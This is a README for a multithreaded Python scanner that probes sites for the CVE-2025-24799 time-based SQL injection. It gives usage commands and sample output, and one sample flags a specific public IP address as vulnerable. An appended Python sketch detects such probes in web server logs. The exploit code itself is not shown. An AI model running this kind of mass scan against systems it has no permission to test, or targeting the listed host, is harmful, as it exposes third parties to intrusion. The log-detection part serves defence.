A fast SQL injection vulnerability scanner built with Python. Uses time-based SQLi detection with multithreading and colorful output, designed for testing CVE-2025-24799 vulnerabilities.
- Scans single URLs or lists from files
- Shows vulnerable URLs live as they're found
- Multithreaded for speed
- Colorful CLI output
- Option to save results
- Clone the repo:
git clone https://github.com/MuhammadWaseem29/CVE-2025-24799.git
cd CVE-2025-24799
- Install required packages:
pip install requests colorama
Run with Python 3:
python3 exploit.py -u http://example.com
Output:
[VULN] http://example.com/index.php/ajax/ - Delay: 7.40s
python3 exploit.py -f urls.txt -t 15
Output:
Scanning: 100/1000 (10.0%)
[VULN] http://example.com/index.php/ajax/ - Delay: 7.10s
python3 exploit.py -f urls.txt -o results.txt -t 10
Output:
Scanning: 50/500 (10.0%)
[VULN] http://test.com/index.php/ajax/ - Delay: 7.20s
[+] Results saved to results.txt
Validate via curl
- -u <URL>: Single URL to scan
- -f <FILE>: File with URLs (one per line)
- -o <FILE>: Save results to file
- -t <NUM>: Number of threads (default: 10)
╔════════════════════════════╗
║ Noob-Wasi SQLi Scanner ║
║ Coded by: Noob-Wasi ║
║ Version: 1.0 ║
╚════════════════════════════╝
Starting SQL injection scan...
Scanning: 200/3494 (5.7%)
[VULN] http://152.67.42.99/index.php/ajax/ - Delay: 7.40s
Scanning: 745/3494 (21.3%)
Scan completed!
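Seen from the server side, a time-based check like the one in the output above appears in access logs as requests to /index.php/ajax/ that take several seconds to answer. The following detection sketch is an added example, not code from this repository; it assumes an nginx "combined" log with $request_time appended, and the threshold, hit count and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

PROBED_PREFIX = "/index.php/ajax"  # path taken from the [VULN] lines above
SLOW_SECONDS = 5.0   # assumed threshold, below the ~7 s delays shown above
MIN_SLOW_HITS = 2    # assumed: require repeats to ignore one-off slowness

# Assumed log format: nginx "combined" with $request_time as the last field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<target>\S+) [^"]*" (?P<status>\d{3}) .* (?P<rt>\d+\.\d+)$'
)

def find_delay_probes(lines):
    """Return {client_ip: [(timestamp, request_time), ...]} for clients with
    at least MIN_SLOW_HITS slow requests to the probed endpoint."""
    slow = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        path = urlsplit(m["target"]).path  # drop any query string
        on_endpoint = (path == PROBED_PREFIX
                       or path.startswith(PROBED_PREFIX + "/"))
        rt = float(m["rt"])
        if on_endpoint and rt >= SLOW_SECONDS:
            slow[m["ip"]].append((m["ts"], rt))
    return {ip: hits for ip, hits in slow.items()
            if len(hits) >= MIN_SLOW_HITS}

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Mar/2025:10:00:01 +0000] "GET /index.php/ajax/ HTTP/1.1" 200 512 "-" "python-requests/2.31.0" 7.402
198.51.100.7 - - [01/Mar/2025:10:00:09 +0000] "GET /index.php/ajax/ HTTP/1.1" 200 512 "-" "python-requests/2.31.0" 7.118
203.0.113.20 - - [01/Mar/2025:10:00:10 +0000] "GET /index.php/ajax/ HTTP/1.1" 200 830 "-" "Mozilla/5.0" 0.084
203.0.113.20 - - [01/Mar/2025:10:00:12 +0000] "GET /index.php/report HTTP/1.1" 200 9000 "-" "Mozilla/5.0" 6.300
203.0.113.50 - - [01/Mar/2025:10:00:15 +0000] "POST /index.php/ajax/ HTTP/1.1" 200 512 "-" "curl/8.5.0" 7.250
""".splitlines()

if __name__ == "__main__":
    for ip, hits in find_delay_probes(SAMPLE_LOG).items():
        print(f"[ALERT] {ip}: {len(hits)} slow requests to {PROBED_PREFIX}", hits)
```

Set SLOW_SECONDS against the endpoint's normal latency in your own logs so that ordinary slow responses do not trigger alerts.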
- Requires Python 3.x
- Test only on systems you have permission to scan
- Adjust threads (-t) based on your system/network
Author: Noob-Wasi
GitHub: github.com/MuhammadWaseem29